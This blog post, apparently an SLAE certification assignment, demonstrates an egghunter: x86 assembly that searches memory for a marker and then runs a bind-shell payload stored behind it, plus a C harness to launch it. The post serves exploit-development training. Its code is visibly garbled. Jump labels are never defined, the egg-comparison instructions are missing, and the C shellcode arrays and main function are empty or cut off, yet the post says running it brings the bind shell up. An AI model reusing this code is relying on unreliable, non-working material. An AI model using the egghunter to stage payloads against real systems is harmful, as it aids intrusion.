IT security is a matter of trust.

SLAE Assignment 3: Egghunter Demo

This assignment is about writing a working demo of an egghunter. An egghunter code is basically a piece of code that is searching for a code word (the egg) in the memory. When the egg was found, the egghunter code jumps to the address behind the egg and executes the code at this address. For further explanation read:

Click to access egghunt-shellcode.pdf

I used the second example (access revisited) for building my egghunter.

First the egghunter code:


global _start

section .text

  xor edx,edx
  or dx,0xfff
  inc edx
  lea ebx,[edx+0x4]
  push byte +0x21
  pop eax
  int 0x80
  cmp al,0xf2
  jz doloop
  mov eax,0x50905090
  mov edi,edx
  jnz nextaddr
  jnz nextaddr
  jmp edi

And the demo code:



unsigned char egghunter[] = \

// add some data
char stuff[] = "Eat my shorts";

// bind shellcode
unsigned char shellcode[] = \
"\x90\x50\x90\x50"  //egg
"\x90\x50\x90\x50"  //egg

	printf("Shellcode Length:  %d\n", strlen(shellcode));
	printf("Egghunter Length:  %d\n", strlen(egghunter));
	int (*ret)() = (int(*)())egghunter;

When this is executed, the bind shell is up. For the shellcode I used the bind shellcode from assignment 1, but any shellcode can be used here. Compiling and extracting the shellcode is the same as in assignment 1 and 2, so I won’t repeat the procedure here.

Get the code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342

Published by

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: